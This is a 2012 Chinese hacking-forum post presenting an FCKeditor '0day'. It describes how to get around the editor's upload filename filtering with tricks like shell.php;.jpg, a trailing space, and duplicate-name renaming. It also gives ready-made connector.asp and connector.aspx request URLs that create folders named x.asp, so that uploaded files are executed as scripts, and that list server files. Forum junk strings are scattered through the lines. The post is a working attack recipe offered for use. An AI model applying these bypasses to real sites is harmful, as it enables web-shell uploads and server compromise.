中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg' y: n- C9 b: A. ]* ^
' e( x2 s1 }. M# j& M5 m
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
8 r, @) L7 _1 x' e0 _9 }) x, W% w2 A% P
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。  q1 _3 m7 r* p! n- {" G2 P9 r
2 _( q! A' F. z/ v1 U8 h0 z' h4 s' O9 s
突破建立文件夹:2 i  S. S( U& N9 J

0 f. _& A4 Q6 b9 V+ {' P& Feditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
* ~9 W; Q; s" F7 s3 U5 a
; `) j+ }6 o( l2 e1 t7 n参数:/ J/ O; P4 o, ]7 x7 F$ L. l

, o# l7 @: u+ p: P) D5 ?- P当前目录名:CurrentFolder=/qing.asp
6 U3 G0 y4 C& l7 F' T
4 |+ W& H9 P  \5 `* K新的目录名:NewFolderName=x.asp# W+ M4 e8 }. ?' x5 B: f$ i
( G& I3 H/ s7 D) E0 V3 D, c
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
) T% z7 `1 z; S3 k1 ~9 q+ N& p6 X
那么 x.asp 就已经建立生成了,此方法百试百灵!$ c- t2 D/ k7 X+ i
% \4 {) d/ Z$ s" Z
新建文件夹参数 x.asp,基本都能搞定。
1 b: c9 P  ~/ y
" h. L8 P/ F4 q7 W3 U下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建* t" a/ o& u* i* Z2 D# S
8 E; t9 t% E: }7 g
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
: d2 M3 h2 `% ^( F* Q: K2 f$ }5 u4 m9 G! J# e" c
获取文件列表
6 d( E% [8 U  V  w- i- j       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F9 u* ]% ~2 [. y6 X% Q5 q
5 R6 g- L- a! H4 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2